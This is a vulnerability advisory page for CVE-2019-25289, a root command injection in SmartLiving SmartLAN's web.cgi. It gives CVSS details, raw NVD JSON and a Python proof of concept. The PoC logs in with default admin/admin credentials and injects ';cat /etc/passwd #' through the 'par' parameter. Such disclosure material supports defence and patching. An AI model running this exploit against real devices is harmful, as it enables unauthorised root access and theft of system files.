Security Vulnerability Report
中文
CVE-2019-25289 CVSS 8.8 HIGH

CVE-2019-25289

Published: 2026-01-08 00:15:59
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

SmartLiving SmartLAN <=6.x contains an authenticated remote command injection vulnerability in the web.cgi binary through the 'par' POST parameter with the 'testemail' module. Attackers can exploit the unsanitized parameter and system() function call to execute arbitrary system commands with root privileges using default credentials.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

SmartLiving SmartLAN <= 6.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2019-25289 PoC - SmartLiving SmartLAN Remote Command Injection # Authentication required with default credentials target_host = sys.argv[1] if len(sys.argv) > 1 else 'http://target.local' username = 'admin' password = 'admin' # Login to get session login_url = f'{target_host}/cgi-bin/web.cgi' login_data = { 'username': username, 'password': password, 'login': '1' } session = requests.Session() response = session.post(login_url, data=login_data) # Verify login success if 'success' in response.text.lower() or response.status_code == 200: print('[+] Login successful') # Exploit command injection via par parameter in testemail module exploit_url = f'{target_host}/cgi-bin/web.cgi' exploit_data = { 'module': 'testemail', 'par': ';cat /etc/passwd #', 'send': '1' } exploit_response = session.post(exploit_url, data=exploit_data) if exploit_response.status_code == 200: print('[+] Command executed successfully') print('Response:', exploit_response.text[:500]) else: print('[-] Exploitation failed') else: print('[-] Login failed - try different credentials')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25289", "sourceIdentifier": "[email protected]", "published": "2026-01-08T00:15:58.797", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SmartLiving SmartLAN <=6.x contains an authenticated remote command injection vulnerability in the web.cgi binary through the 'par' POST parameter with the 'testemail' module. Attackers can exploit the unsanitized parameter and system() function call to execute arbitrary system commands with root privileges using default credentials."}, {"lang": "es", "value": "SmartLiving SmartLAN &lt;=6.x contiene una vulnerabilidad de inyección de comandos remota autenticada en el binario web.cgi a través del parámetro POST 'par' con el módulo 'testemail'. Los atacantes pueden explotar el parámetro no saneado y la llamada a la función system() para ejecutar comandos de sistema arbitrarios con privilegios de root utilizando credenciales predeterminadas."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://cxsecurity.com/issue/WLB-2019120046", "source": "[email protected]"}, {"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/172840", "source": "[email protected]"}, {"url": "https://packetstormsecurity.com/files/155616", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/47765", "source": "[email protected]"}, {"url": "https://www.inim.biz/", "source": "[email protected]"}, {"url": "https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5544.php", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.